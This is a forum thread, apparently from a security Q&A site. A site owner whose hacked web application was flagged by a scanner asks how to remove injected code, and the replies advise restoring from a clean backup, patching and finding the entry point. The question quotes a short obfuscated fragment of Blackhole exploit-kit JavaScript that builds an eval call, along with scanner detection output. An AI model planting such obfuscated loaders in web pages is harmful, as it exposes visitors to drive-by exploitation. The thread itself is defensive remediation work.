-2

Possible Duplicate:
My server’s been hacked EMERGENCY

My web application has been hacked and trying to remove the malware/code injection.

Scanning it through http://sitecheck.sucuri.net and it says

Known javascript malware.

Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v20<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){try{v["document"]["body"]="123"}catch(gds){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}}

I have searched the code for the string out of the above Details like "wEGWEGWEg" and "fsebgreber" with grep but got nothing.

Scanned the application with the iscanner and it detected the following remote source.

[2.3] ((?:.*?</script>)?) Javascript code from remote source detected.

<script type="text/javascript" src="https://tq935.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=afde567bd5e0bd8d2b40870206901b9b"></script>

Need help to remove the code injections.

Community
  • 1
user105566
  • 29
  • 1
  • 5
  • Best thing to do is nuke it and restore from a backup and then patch, patch, patch! – Zapto Oct 26 '12 at 11:40
  • Make sure it's a backup from *before* you were compromised. And to be sure that you're doing that, you have to figure out *how* and *when* you were compromised. – Ladadadada Oct 26 '12 at 11:56

1 Answers1

0

There are two common scenarios & 1 outside possibility...

  1. The harmful code has added to the pages (and is has most likely been encoded) so it won't be in plain-text and easily read. You'd need to find some text from that script and remove it from that page + search all of the other pages.

  2. Its a SQL injection attack and the harmful code/script actually resides in your SQL database.

  3. Code could be added in both places.

As others have suggested, the cleanest, safest, non-hands-on removal would be to restore from a clean backup (database & website files). The other option, depending on your experience, is to go through and manually clean things up.

To find out how the compromise occurred, it will take time, but the first few things are to consider vulnerable 3rd-party scripts/plugins, your own hand-written code, file/image upload scripts, and a compromised user account. I'd change your passwords for all of the accounts you use on the site as a starting point. I'd also confirm you're running the latest version of WP, but most likely the attack came in from one of the plugins.

if you want to work on figuring out the injection happened and before you restore the site, download the entire site/code and run it locally. Just realize that you're running a compromised website/code on your computer -- Understand the ramifications. There are vulnerability assessment programs/scanners, as well as freelancers that can help locate potential holes in the website.

bmurtagh
  • 773
  • 2
  • 6
  • 13